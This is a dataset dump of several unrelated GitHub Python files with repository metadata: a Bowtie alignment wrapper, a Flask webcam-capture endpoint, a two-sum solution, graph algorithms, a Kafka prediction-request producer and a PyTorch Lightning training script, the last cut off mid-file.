v_mis=\"1\", out_type=\"tabular\",\n aligned=\"None\", unaligned=\"None\", input_format=\"fasta\", input=\"path\",\n index=\"path\", output=\"path\", pslots=\"4\"):\n if input_format == \"fasta\":\n input_format = \"-f\"\n elif (input_format == \"fastq\") or (input_format == \"fastqsanger\"):\n input_format = \"-q\"\n else:\n raise Exception('input format must be one of fasta or fastq')\n if alignment_method == \"RNA\":\n x = \"-v %s -M 1 --best --strata -p %s --norc --suppress 6,7,8\" % (\n v_mis, pslots)\n elif alignment_method == \"unique\":\n x = \"-v %s -m 1 -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"multiple\":\n x = \"-v %s -M 1 --best --strata -p %s --suppress 6,7,8\" % (\n v_mis, pslots)\n elif alignment_method == \"k_option\":\n x = \"-v %s -k 1 --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"n_option\":\n x = \"-n %s -M 1 --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n elif alignment_method == \"a_option\":\n x = \"-v %s -a --best -p %s --suppress 6,7,8\" % (v_mis, pslots)\n if aligned == \"None\" and unaligned == \"None\":\n fasta_command = \"\"\n elif aligned != \"None\" and unaligned == \"None\":\n fasta_command = \" --al %s\" % aligned\n elif aligned == \"None\" and unaligned != \"None\":\n fasta_command = \" --un %s\" % unaligned\n else:\n fasta_command = \" --al %s --un %s\" % (aligned, unaligned)\n x = x + fasta_command\n if out_type == \"tabular\":\n return \"bowtie %s %s %s %s > %s\" % (x, index, input_format, input, output)\n elif out_type == \"sam\":\n return \"bowtie %s -S %s %s %s > %s\" % (x, index, input_format, input, output)\n elif out_type == \"bam\":\n return \"bowtie %s -S %s %s %s |samtools view -bS - > %s\" % (\n x, index, input_format, input, output)\n\n\ndef bowtie_squash(fasta):\n # make temp directory for bowtie indexes\n tmp_index_dir = tempfile.mkdtemp()\n ref_file = tempfile.NamedTemporaryFile(dir=tmp_index_dir)\n ref_file_name = ref_file.name\n # by default, delete the temporary file, but ref_file.name is now stored\n # in ref_file_name\n ref_file.close()\n # symlink between the fasta source file and the deleted ref_file name\n os.symlink(fasta, ref_file_name)\n # bowtie command line, which will work after changing dir\n # (cwd=tmp_index_dir)\n cmd1 = 'bowtie-build -f %s %s' % (ref_file_name, ref_file_name)\n try:\n FNULL = open(os.devnull, 'w')\n # a path string for a temp file in tmp_index_dir. Just a string\n tmp = tempfile.NamedTemporaryFile(dir=tmp_index_dir).name\n # creates and open a file handler pointing to the temp file\n tmp_stderr = open(tmp, 'wb')\n # both stderr and stdout of bowtie-build are redirected in dev/null\n proc = subprocess.Popen(\n args=cmd1, shell=True, cwd=tmp_index_dir, stderr=FNULL, stdout=FNULL)\n returncode = proc.wait()\n tmp_stderr.close()\n FNULL.close()\n sys.stdout.write(cmd1 + \"\\n\")\n except Exception as e:\n # clean up temp dir\n if os.path.exists(tmp_index_dir):\n shutil.rmtree(tmp_index_dir)\n stop_err('Error indexing reference sequence\\n' + str(e))\n # no Cleaning if no Exception, tmp_index_dir has to be cleaned after\n # bowtie_alignment()\n # bowtie fashion path without extention\n index_full_path = os.path.join(tmp_index_dir, ref_file_name)\n return tmp_index_dir, index_full_path\n\n\ndef bowtie_alignment(command_line, flyPreIndexed=''):\n # make temp directory just for stderr\n tmp_index_dir = tempfile.mkdtemp()\n tmp = tempfile.NamedTemporaryFile(dir=tmp_index_dir).name\n tmp_stderr = open(tmp, 'wb')\n # conditional statement for sorted bam generation viewable in Trackster\n if \"samtools\" in command_line:\n # recover the final output file name\n target_file = command_line.split()[-1]\n path_to_unsortedBam = os.path.join(tmp_index_dir, \"unsorted.bam\")\n path_to_sortedBam = os.path.join(tmp_index_dir, \"unsorted.bam.sorted\")\n first_command_line = \" \".join(\n command_line.split()[:-3]) + \" -o \" + path_to_unsortedBam + \" - \"\n # example: bowtie -v 0 -M 1 --best --strata -p 12 --suppress 6,7,8 -S\n # /home/galaxy/galaxy-dist/bowtie/Dmel/dmel-all-chromosome-r5.49 -f\n # /home/galaxy/galaxy-dist/database/files/003/dataset_3460.dat\n # |samtools view -bS -o /tmp/tmp_PgMT0/unsorted.bam -\n # generates an \"unsorted.bam.sorted.bam file\", NOT an\n # \"unsorted.bam.sorted\" file\n second_command_line = \"samtools sort %s %s\" % (\n path_to_unsortedBam, path_to_sortedBam)\n # fileno() method return the file descriptor number of tmp_stderr\n p = subprocess.Popen(\n args=first_command_line, cwd=tmp_index_dir, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(\"%s\\n\" % first_command_line + str(returncode))\n p = subprocess.Popen(\n args=second_command_line, cwd=tmp_index_dir, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(\"\\n%s\\n\" % second_command_line + str(returncode))\n if os.path.isfile(path_to_sortedBam + \".bam\"):\n shutil.copy2(path_to_sortedBam + \".bam\", target_file)\n else:\n p = subprocess.Popen(\n args=command_line, shell=True, stderr=tmp_stderr.fileno())\n returncode = p.wait()\n sys.stdout.write(command_line + \"\\n\")\n tmp_stderr.close()\n # cleaning if the index was created in the fly\n if os.path.exists(flyPreIndexed):\n shutil.rmtree(flyPreIndexed)\n # cleaning tmp files and directories\n if os.path.exists(tmp_index_dir):\n shutil.rmtree(tmp_index_dir)\n return\n\n\ndef __main__():\n args = Parser()\n F = open(args.output, \"w\")\n if args.index_from == \"history\":\n tmp_dir, index_path = bowtie_squash(args.index_source)\n else:\n tmp_dir, index_path = \"dummy/dymmy\", args.index_source\n command_line = bowtieCommandLiner(args.method, args.v_mismatches, args.output_format,\n args.aligned, args.unaligned, args.input_format, args.input, \n index_path, args.output, args.num_threads)\n bowtie_alignment(command_line, flyPreIndexed=tmp_dir)\n F.close()\nif __name__ == \"__main__\":\n __main__()\n","repo_name":"trb116/pythonanalyzer","sub_path":"data/input/ARTbio/tools-artbio/tools/msp_sr_bowtie/sRbowtie.py","file_name":"sRbowtie.py","file_ext":"py","file_size_in_byte":8881,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"741424643","text":"from flask import Flask\nfrom flask import request, jsonify\nimport cv2\n\napp = Flask(__name__)\n\n@app.route('/LiveCapture', methods=['POST'])\ndef capture():\n\tvideoCaptureObject = cv2.VideoCapture(0)\n\tresult = True\n\twhile(result):\n\t ret,frame = videoCaptureObject.read()\n\t cv2.imwrite(\"NewPicture.jpg\",frame)\n\t result = False\n\tvideoCaptureObject.release()\n\tcv2.destroyAllWindows()\n\treturn \"image captured\"\n\napp.run(debug=True)\n\n","repo_name":"AnuraagBeniwal2610/facial-recognition","sub_path":"flask_basic.py","file_name":"flask_basic.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42019447737","text":"# 给定一个整数数组 nums 和一个整数目标值 target,请你在该数组中找出 和为目标值 的那 两个 整数,并返回它们的数组下标。 \n# 你可以假设每种输入只会对应一个答案。但是,数组中同一个元素不能使用两遍。\n# 你可以按任意顺序返回答案。\n#\n# 示例 1: \n# 输入:nums = [2,7,11,15], target = 9\n# 输出:[0,1]\n# 解释:因为 nums[0] + nums[1] == 9 ,返回 [0, 1] 。\n#\n# 示例 2: \n# 输入:nums = [3,2,4], target = 6\n# 输出:[1,2]\n#\n# 示例 3: \n# 输入:nums = [3,3], target = 6\n# 输出:[0,1]\n#\n# 提示: \n# 2 <= nums.length <= 103\n# -109 <= nums[i] <= 109 \n# -109 <= target <= 109 \n# 只会存在一个有效答案 \n# \n# Related Topics 数组 哈希表 \n# 👍 10348 👎 0\n\"\"\"\n思路:\n逆向思维, 创建dict, 遍历数组使用target与每次循环的value进行相减\n若不存在则插入{value: index}, 若存在直接返回结果\n时间复杂度为 O(n)\n若有返回多组结果的情况下可在创建一个list, 之后对通过检验的数据进行append操作即可\n\"\"\"\n\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n data = {}\n for i, v in enumerate(nums):\n _num = target - v\n if _num in data:\n return [data[_num], i]\n data[v] = i\n\n\nif __name__ == '__main__':\n nums = [3, 3]\n target = 6\n Solution().twoSum(nums, target)\n","repo_name":"wangqingli666/Leetcode","sub_path":"leetcode/editor/cn/[1]两数之和.py","file_name":"[1]两数之和.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13052656047","text":"def read_from_file(path):\n with open(path) as f:\n data_list = [int(number) for number in f.read().split()]\n if len(data_list) % 2 == 0 or len(data_list) < 3:\n print(\"Wrong amount of input items\")\n exit()\n return data_list\n\n\ndef create_pairs(data):\n pairs_list = []\n for person_index in range(1, len(data), 2):\n pairs_list.append([data[person_index], data[person_index + 1]])\n return pairs_list\n\n\ndef move_pairs_to_clans(pairs_list):\n original_clans = []\n clans = list(pairs_list)\n for pair in pairs_list:\n for clan in clans:\n if set(pair) & set(clan) and pair != clan:\n clan.extend(pair)\n\n for clan in clans:\n for subsequence in clans:\n if set(subsequence).issubset(set(clan)) and subsequence != clan:\n clans.remove(subsequence)\n\n for clan in clans:\n if len(set(clan)) != len(clan):\n original_clans.append(list(set(clan)))\n else:\n original_clans.append(clan)\n return original_clans\n\n\ndef create_adjacency_list(clans):\n adj_dict = {}\n for clan in clans:\n for person_index in range(len(clan)):\n clan_copy = list(clan)\n clan_copy.pop(person_index)\n if clan[person_index] in adj_dict.keys():\n adj_dict[clan[person_index]].append(clan_copy)\n else:\n adj_dict.update({clan[person_index]: clan_copy})\n\n return adj_dict\n\n\ndef rebuild_adjacency_list(adjacency_list):\n new_adjacency_list = {}\n vertexes = adjacency_list.keys()\n for person in vertexes:\n for another_person in vertexes:\n if person == another_person or another_person in adjacency_list[person]:\n continue\n elif person in new_adjacency_list.keys():\n new_adjacency_list[person].append(another_person)\n else:\n new_adjacency_list.update({person: [another_person]})\n return new_adjacency_list\n\n\ndef count_possible_pairs(rebuilt_adjacency_list):\n pairs_count = 0\n dict_keys = rebuilt_adjacency_list.keys()\n for person in dict_keys:\n values = rebuilt_adjacency_list[person]\n for potential_pair in values:\n if potential_pair % 2 != person % 2:\n pairs_count += 1\n return int(pairs_count / 2)\n\n\ndef algorithm(data_path):\n return count_possible_pairs(\n rebuild_adjacency_list(create_adjacency_list(move_pairs_to_clans(create_pairs(read_from_file(data_path))))))\n","repo_name":"nyko27/algo_lab3","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30286595719","text":"import sys\r\nfrom create_dataset import wavelet_data\r\nimport pywt\r\n\r\nimport dill\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nimport numpy as np\r\nfrom neupy.algorithms import PNN\r\n\r\nimport time\r\n\r\n#path =\"data\"\r\n\r\nstart_time = time.time()\r\n\r\ndef train(path=\"data\"):\r\n audio_data, audio_label = wavelet_data(path)\r\n\r\n X = np.float32(audio_data) \r\n print('shape X:', str(X.shape))\r\n\r\n Y = audio_label\r\n print('shape Y: ', str(len(Y)))\r\n\r\n # Encode class target ke integer\r\n # encoder = LabelEncoder()\r\n # encoder.fit(img_label)\r\n # Y = encoder.transform(img_label)\r\n # print('shape Y:', str(Y.shape))\r\n\r\n X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2) #untuk spilt data latih n uji\r\n print('X_train shape: ', X_train.shape)\r\n print('X_test shape', X_test.shape)\r\n\r\n pnn = PNN(std=2, verbose=False)\r\n pnn.train(X_train, Y_train)\r\n\r\n with open('pnn-model.dill', 'wb') as f:\r\n dill.dump(pnn, f)\r\n\r\n result = pnn.predict(X_test)\r\n\r\n n_predicted_correctly = np.sum(result == Y_test)\r\n n_test_samples = X_test.shape[0]\r\n\r\n print(\"Guessed {} out of {}\".format(n_predicted_correctly, n_test_samples))\r\n print(\"Processiing time : %s seconds\" % (time.time() - start_time))\r\n\r\nif __name__ == '__main__':\r\n train()\r\n","repo_name":"josep112/Voice-biometric","sub_path":"test_train.py","file_name":"test_train.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"74671870880","text":"\"\"\"\nSimple implementation of a directed acyclic graph in python, with depth-first and breadth-first path searches\n\nTODO:\n\nUndirected Graphs, adjacency matrices\n\nhttps://pythonandr.com/2016/07/28/implementing-undirected-graphs-in-python/\n\nShortest path:\n\n Dijkstra's algorithm (weighted edges with non-negative edge weights)\n - https://www.youtube.com/watch?v=pSqmAO-m7Lk\n - https://www.youtube.com/watch?v=pVfj6mxhdMw\n\n Breadth-first search (unweighted edges)\n - https://medium.com/@yasufumy/algorithm-breadth-first-search-408297a075c9\n\n Bellman-Ford algorithm (weighted edges with positive and negative weights)\n - https://www.youtube.com/watch?v=lyw4FaxrwHg\n\nDirected Acyclic Graphs:\n\n Topological sort - https://www.youtube.com/watch?v=eL-KzMXSXXI\n\nPython library implementation of a graph\n\nUndirected graphs and coloring\n\"\"\"\n\n\nclass Node:\n \"\"\"\n The class definition for a graph node\n \"\"\"\n def __init__(self, id):\n self.adjacent = set() # a set (hashset) to store nodes which this node has an edge pointing to\n self.id = id # this node's unique ID\n\n\nclass Graph:\n \"\"\"\n The class object for a graph (DAG)\n \"\"\"\n def __init__(self):\n self.node_dict = {} # a dictionary of nodes keyed by their unique ID\n\n def __str__(self):\n return str(self.node_dict)\n\n def add_node(self, id):\n \"\"\"\n Add a node to the graph\n \"\"\"\n if id in self.node_dict:\n raise ValueError(\"Node with ID {} already exists\".format(id))\n else:\n self.node_dict[id] = Node(id)\n\n def add_edge(self, source_id, dest_id, undirected=False):\n \"\"\"\n Add an edge between source and dest nodes\n \"\"\"\n self.get_node(source_id).adjacent.add(self.get_node(dest_id))\n if undirected:\n self.get_node(dest_id).adjacent.add(self.get_node(source_id))\n\n def get_node(self, id):\n \"\"\"\n Return the Node object associated with an ID\n \"\"\"\n return self.node_dict[id]\n\n def get_adjacency_matrix(self):\n \"\"\"\n Returns the adjacency matrix as a List[List[int]]. Entries are in sorted() order by vertex ID\n \"\"\"\n # get IDs in sorted order\n ids = sorted(self.node_dict)\n N = len(ids)\n\n # initialize adjacency matrix\n adj_matrix = [[0 for i in range(N)] for j in range(N)]\n\n # build adjacency matrix\n for id in ids:\n u = self.get_node(id)\n for v in u.adjacent:\n adj_matrix[ids.index(u.id)][ids.index(v.id)] = 1\n\n return adj_matrix\n\n def path_dfs(self, source_id, dest_id):\n \"\"\"\n A DFS algorithm for whether the node with dest_id can be reached from the node with source_id\n \"\"\"\n\n visited = set() # create a set which contains nodes which have been visited\n source = self.get_node(source_id)\n dest = self.get_node(dest_id)\n return self._path_dfs_helper(source, dest, visited)\n\n def _path_dfs_helper(self, source, dest, visited):\n \"\"\"\n This function uses actual nodes, not node ids\n \"\"\"\n # if we've already visited this node, immediately return false\n if source in visited:\n return False\n # now, if we haven't visited this node, but the id is equal to the id we want, return True\n elif source == dest:\n return True\n # finally, if we haven't visited this node, add it to the set of visited nodes, and search its adjacent nodes\n else:\n visited.add(source)\n for node in source.adjacent:\n if self._path_dfs_helper(node, dest, visited):\n return True\n return False\n\n def path_bfs(self, source_id, dest_id):\n \"\"\"\n A BFS algorithm for whether or not there's a path from source to dest, using a queue\n \"\"\"\n source = self.get_node(source_id)\n dest = self.get_node(dest_id)\n\n queue = [source]\n visited = {source}\n\n while queue:\n node = queue.pop(0)\n\n if node == dest:\n return True\n else:\n for adj_node in node.adjacent:\n if adj_node not in visited:\n queue.append(adj_node)\n\n return False\n\n\ndef detect_cycle(graph: Graph):\n \"\"\"\n Returns True if a cycle exists in the graph. Uses the classic white/gray/black set depth first search algorithm\n\n Add all nodes to the white set. Start with any (iter(white).next()) node in the white set, and do our modified DFS\n on it. When we enter DFS, move the node from white set to gray set. For all adjacent nodes, if the node is in the\n black set, don't visit it. If it's in the gray set, then we've found a cycle. If it's in the white set, continue\n with DFS down that node. After returning from all children nodes (i.e. when returning from the recursive dfs\n function), move the node from the gray to the black set.\n \"\"\"\n white = {node for node in graph.node_dict.values()}\n gray = set()\n black = set()\n\n while white:\n # grab a random node in the white set\n node = next(iter(white))\n # return true if the dfs search returns true, there was a cycle, otherwise keep going\n if _cycle_detection_dfs_helper(node, white, gray, black):\n return True\n\n # if we've gone through all the nodes, return false, no cycle\n return False\n\n\ndef _cycle_detection_dfs_helper(node: Node, white: set, gray: set, black: set):\n # move node from white to gray\n white.remove(node)\n gray.add(node)\n\n # iterate through adjacent nodes\n for v in node.adjacent:\n # if v is in the black set, move on. We don't want to revisit nodes in the black set\n if v in black:\n continue\n\n # if v is in the gray set, return True now, since we've found a cycle\n if v in gray:\n return True\n\n # else (it must be in the white set), dfs with v, return True if the dfs returns True\n if _cycle_detection_dfs_helper(v, white, gray, black):\n return True\n\n # after finishing recursing, move this node from the gray set to the black set, and return False\n gray.remove(node)\n black.add(node)\n\n return False\n\n\ndef topsort(graph):\n \"\"\"\n Find a topological ordering for a graph. Do this by selecting a node at random in the graph, and then doing a DFS,\n adding the node to the topological ordering in reverse order when the DFS recursive function returns from that node\n \"\"\"\n unvisited = set(graph.node_dict.values())\n top_ordering = []\n\n while unvisited:\n start_node = next(iter(unvisited))\n _topsort_dfs_helper(start_node, unvisited, top_ordering)\n\n return top_ordering[::-1]\n\n\ndef _topsort_dfs_helper(node, unvisited, top_ordering):\n # if we've already visited this node, return immediately\n if node not in unvisited:\n return\n else:\n # set this node as visited\n unvisited.remove(node)\n\n # recurse into adjacent nodes\n for adj_node in node.adjacent:\n _topsort_dfs_helper(adj_node, unvisited, top_ordering)\n\n # when we return from this node, add its id to the topological ordering\n top_ordering.append(node.id)\n\n\nif __name__ == '__main__':\n g = Graph()\n\n g.add_node('A')\n g.add_node('B')\n g.add_node('C')\n g.add_node('D')\n g.add_node('E')\n g.add_node('F')\n g.add_node('G')\n g.add_node('H')\n\n g.add_edge('A', 'B')\n g.add_edge('A', 'C')\n g.add_edge('B', 'H')\n g.add_edge('C', 'F')\n g.add_edge('C', 'G')\n g.add_edge('C', 'D')\n g.add_edge('D', 'H')\n g.add_edge('D', 'E')\n\n # print(g.path_dfs('G', 'H'))\n # print(g.path_bfs('A', 'H'))\n #\n # print(g.get_adjacency_matrix())\n\n print(topsort(g))\n\n print(detect_cycle(g))\n","repo_name":"daveboat/interview_prep","sub_path":"coding_practice/graphs/graph_impl.py","file_name":"graph_impl.py","file_ext":"py","file_size_in_byte":7884,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"38820612721","text":"'''\nThis script simulates an application which requests prediction for some input samples of Fashion MNIST dataset\n''' \nimport sys, os\nimport time\nimport json\nimport config\ncwd = os.getcwd()\nsys.path.append(cwd.split('ML_system')[0])\n\nfrom Classifier.DataLoader import DataLoader\n\nfrom PubSub_API.BrokerProvider import BrokerProvider\nfrom PubSub_API.Producer import Producer\n\n\ndef main():\n # load dataset\n data = DataLoader()\n data.load_TF_data('fashion_mnist')\n val_input_data = data.test_ds['image']\n\n # instantiate producer\n broker = BrokerProvider(service='kafka')\n producer = broker.get_producer()\n producer.create_topic(config.PREDICTION_REQUEST)\n\n # simulate prediction requests\n for ind, image in enumerate(val_input_data):\n message = {ind: image.tolist()} # send message with a key identyfing which input sample we are passing\n encoded_message = json.dumps(message, indent=2).encode('utf-8')\n producer.write(topic=config.PREDICTION_REQUEST, msg=encoded_message)\n print(f'sent {ind}th image to broker')\n time.sleep(5)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"janekzimoch/Using_Kafka_with_ML_model","sub_path":"ML_system/prediction_query_app.py","file_name":"prediction_query_app.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8424893161","text":"import argparse\r\nimport os\r\nimport re\r\nimport shutil\r\nimport subprocess\r\nimport tempfile\r\nimport warnings\r\nfrom datetime import datetime, timedelta\r\nfrom pathlib import Path\r\nfrom types import SimpleNamespace\r\nfrom typing import List\r\n\r\nimport numpy as np\r\nimport pytorch_lightning as pl\r\nimport urllib3\r\nimport yaml\r\nfrom git import Repo\r\nfrom git.exc import InvalidGitRepositoryError\r\nfrom mlflow.tracking import MlflowClient\r\nfrom pytorch_lightning.callbacks import Callback, ModelCheckpoint\r\nfrom pytorch_lightning.loggers import MLFlowLogger\r\n\r\nimport guided_mvs_lib.models as models\r\nfrom guided_mvs_lib.datasets import MVSDataModule\r\nfrom guided_mvs_lib.datasets.sample_preprocess import MVSSampleTransform\r\nfrom guided_mvs_lib.utils import *\r\n\r\n\r\ndef run_training(\r\n params: Union[str, Path, dict] = \"params.yaml\",\r\n cmdline_args: Optional[List[str]] = None,\r\n datapath: Union[str, Path, None] = None,\r\n outpath: Union[str, Path] = \"output\",\r\n logspath: Union[str, Path] = \".\",\r\n):\r\n # handle args\r\n outpath = Path(outpath)\r\n logspath = Path(logspath)\r\n\r\n # remove annoying torch specific version warnings\r\n warnings.simplefilter(\"ignore\", UserWarning)\r\n urllib3.disable_warnings()\r\n\r\n parser = argparse.ArgumentParser(description=\"training procedure\")\r\n\r\n # training params\r\n parser.add_argument(\r\n \"--gpus\", type=int, default=1, help=\"number of gpus to select for training\"\r\n )\r\n parser.add_argument(\r\n \"--fast-dev-run\",\r\n nargs=\"?\",\r\n const=True,\r\n default=False,\r\n help=\"if execute a single step of train and val, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--limit-train-batches\",\r\n type=int,\r\n default=None,\r\n help=\"limits the number of batches for each epoch, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--limit-val-batches\",\r\n type=int,\r\n default=None,\r\n help=\"limits the number of batches for each epoch, to debug\",\r\n )\r\n parser.add_argument(\r\n \"--resume-from-checkpoint\",\r\n nargs=\"?\",\r\n const=True,\r\n default=False,\r\n help=\"if resume from the last checkpoint or from a specific checkpoint\",\r\n )\r\n parser.add_argument(\r\n \"--load-weights\",\r\n default=None,\r\n type=str,\r\n help=\"load weights either from a mlflow train or from a checkpoint file\",\r\n )\r\n\r\n # experiment date\r\n date = datetime.now().strftime(r\"%Y-%h-%d-%H-%M\")\r\n\r\n # parse arguments and merge from params.yaml\r\n cmd_line_args = parser.parse_args(cmdline_args)\r\n if isinstance(params, dict):\r\n train_args = params\r\n else:\r\n with open(params, \"rt\") as f:\r\n train_args = yaml.safe_load(f)\r\n\r\n args = SimpleNamespace(**vars(cmd_line_args))\r\n for k, v in train_args.items():\r\n if not isinstance(v, dict):\r\n setattr(args, k, v)\r\n else:\r\n setattr(args, k, SimpleNamespace(**v))\r\n\r\n # Train using pytorch lightning\r\n pl.seed_everything(42)\r\n\r\n # Build LightningDataModule\r\n data_module = MVSDataModule(\r\n args.train.dataset,\r\n batch_size=args.train.batch_size,\r\n datapath=datapath,\r\n nviews=args.train.views,\r\n ndepths=args.train.ndepths,\r\n robust_train=True if args.train.dataset == \"dtu_yao\" else False,\r\n transform=MVSSampleTransform(\r\n generate_hints=args.train.hints,\r\n hints_perc=args.train.hints_density,\r\n filtering_window=tuple(args.train.hints_filter_window),\r\n ),\r\n )\r\n\r\n # loading model or only weights ?\r\n if args.load_weights is not None and args.resume_from_checkpoint is not False:\r\n print(\"Use either --load-weights or --resume-from-checkpoint\")\r\n return\r\n\r\n ckpt_path = None\r\n steps_re = re.compile(\"step=(\\d+)\")\r\n if args.resume_from_checkpoint is True:\r\n if (outpath / \"ckpts/last.ckpt\").exists():\r\n ckpt_path = outpath / \"ckpts/last.ckpt\"\r\n else:\r\n ckpts = list((outpath / \"ckpts\").glob(\"*.ckpt\"))\r\n steps = [\r\n int(steps_re.findall(ckpt.name)[0])\r\n for ckpt in ckpts\r\n if steps_re.findall(ckpt.name) is not []\r\n ]\r\n if not steps:\r\n print(\"not found any valid checkpoint in\", str(outpath / \"ckpts\"))\r\n return\r\n ckpt_path = ckpts[np.argmax(steps)]\r\n print(f\"resuming from last checkpoint: {ckpt_path}\")\r\n elif args.resume_from_checkpoint is not False:\r\n if Path(args.resume_from_checkpoint).exists():\r\n ckpt_path = args.resume_from_checkpoint\r\n print(f\"resuming from choosen checkpoint: {ckpt_path}\")\r\n else:\r\n print(f\"file {ckpt_path} does not exist\")\r\n return\r\n\r\n # init mlflow logger and model\r\n if ckpt_path is None:\r\n logger = MLFlowLogger(\r\n experiment_name=\"guided-mvs\",\r\n run_name=f\"{args.model}-{date}\",\r\n )\r\n\r\n outpath.mkdir(exist_ok=True, parents=True)\r\n with open(outpath / \"run_uuid\", \"wt\") as f:\r\n f.write(logger.run_id)\r\n\r\n model = models.MVSModel(\r\n args=args,\r\n mlflow_run_id=logger.run_id,\r\n v_num=f\"{args.model}-{'-'.join(date.split('-')[1:3])}\",\r\n )\r\n else:\r\n\r\n with open(outpath / \"run_uuid\", \"rt\") as f:\r\n mlflow_run_id = f.readline().strip()\r\n\r\n model = models.MVSModel.load_from_checkpoint(\r\n ckpt_path,\r\n args=args,\r\n mlflow_run_id=mlflow_run_id,\r\n v_num=f\"{args.model}-{'-'.join(date.split('-')[1:3])}\",\r\n )\r\n logger = MLFlowLogger(\r\n experiment_name=\"guided-mvs\",\r\n run_name=f\"{args.model}-{date}\",\r\n )\r\n logger._run_id = mlflow_run_id\r\n\r\n # if required load weights\r\n if args.load_weights is not None:\r\n mlflow_client: MlflowClient = logger.experiment\r\n if args.load_weights in [\r\n run.run_uuid for run in mlflow_client.list_run_infos(logger.experiment_id)\r\n ]:\r\n # download the model\r\n run_weights_path = mlflow_client.download_artifacts(args.load_weights, \"model.ckpt\")\r\n model.load_state_dict(torch.load(run_weights_path)[\"state_dict\"])\r\n\r\n # track the model weights\r\n run_weights_path = Path(run_weights_path)\r\n shutil.move(run_weights_path, run_weights_path.parent / \"init_weights.ckpt\")\r\n mlflow_client.log_artifact(\r\n logger.run_id, run_weights_path.parent / \"init_weights.ckpt\"\r\n )\r\n mlflow_client.set_tag(logger.run_id, \"load_weights\", args.load_weights)\r\n shutil.rmtree(Path(run_weights_path).parent, ignore_errors=True)\r\n else:\r\n try:\r\n model.load_state_dict(torch.load(args.load_weights)[\"state_dict\"])\r\n tmpdir = Path(tempfile.mkdtemp())\r\n shutil.copy(args.load_weights, tmpdir / \"init_weights.ckpt\")\r\n mlflow_client.log_artifact(logger.run_id, tmpdir / \"init_weights.ckpt\")\r\n shutil.rmtree(tmpdir, ignore_errors=True)\r\n except FileNotFoundError:\r\n print(f\"{args.load_weights} is neither a valid run id or a path to a .ckpt\")\r\n return\r\n\r\n # handle checkpoints\r\n if (\r\n args.train.epochs is None\r\n or args.train.epochs == 1\r\n and args.train.steps is not None\r\n and args.train.steps > 0\r\n ):\r\n ckpt_callback = ModelCheckpoint(\r\n outpath / \"ckpts\",\r\n train_time_interval=timedelta(hours=2),\r\n save_last=True,\r\n )\r\n else:\r\n ckpt_callback = ModelCheckpoint(outpath / \"ckpts\", save_last=True)\r\n\r\n remove_output = True\r\n\r\n class HandleOutputs(Callback):\r\n def on_train_end(self, trainer, pl_module):\r\n\r\n # save final model\r\n print(\"saving the final model.\")\r\n torch.save(\r\n {\"global_step\": trainer.global_step, \"state_dict\": pl_module.state_dict()},\r\n outpath / \"model.ckpt\",\r\n )\r\n\r\n # copy the model and the params on MLFlow\r\n if not args.fast_dev_run:\r\n mlflow_client: MlflowClient = logger.experiment\r\n\r\n # store diff file if needed\r\n try:\r\n repo = Repo(Path.cwd())\r\n\r\n if repo.is_dirty():\r\n try:\r\n out = subprocess.check_output([\"git\", \"diff\"], cwd=Path.cwd())\r\n if out is not None:\r\n tmpfile = Path(tempfile.mkdtemp()) / \"changes.diff\"\r\n with open(tmpfile, \"wb\") as f:\r\n f.write(out)\r\n mlflow_client.log_artifact(logger.run_id, tmpfile)\r\n os.remove(tmpfile)\r\n except subprocess.CalledProcessError as e:\r\n print(\"Failed to save a diff file of the current experiment\")\r\n\r\n except InvalidGitRepositoryError:\r\n pass\r\n\r\n # save the model\r\n mlflow_client.log_artifact(logger.run_id, str(outpath / \"model.ckpt\"))\r\n\r\n # finally, remove the temp output and log in a hidden file the current run\r\n # for the eval step\r\n with open(\".current_run.yaml\", \"wt\") as f:\r\n yaml.safe_dump(\r\n {\"experiment\": logger.experiment_id, \"run_uuid\": logger.run_id}, f\r\n )\r\n\r\n def on_keyboard_interrupt(self, trainer, pl_module):\r\n print(\"training interrupted\")\r\n\r\n # (not removing checkpoints)\r\n nonlocal remove_output\r\n remove_output = False\r\n\r\n # init train\r\n trainer_params = {\r\n \"gpus\": args.gpus,\r\n \"fast_dev_run\": args.fast_dev_run,\r\n \"logger\": logger,\r\n \"benchmark\": True,\r\n \"callbacks\": [ckpt_callback, HandleOutputs()],\r\n \"weights_summary\": None,\r\n \"resume_from_checkpoint\": ckpt_path,\r\n \"num_sanity_val_steps\": 0,\r\n }\r\n\r\n if (\r\n args.resume_from_checkpoint is not False\r\n and args.train.epochs is not None\r\n and args.train.epochs == 1\r\n and args.train.steps is not None\r\n and args.train.steps > 0\r\n and ckpt_path is not None\r\n ):\r\n args.train.epochs = None\r\n\r\n if args.train.epochs is not None:\r\n trainer_params[\"max_epochs\"] = args.train.epochs\r\n if args.train.steps is not None:\r\n trainer_params[\"max_steps\"] = args.train.steps\r\n if args.limit_train_batches is not None:\r\n trainer_params[\"limit_train_batches\"] = args.limit_train_batches\r\n if args.limit_val_batches is not None:\r\n 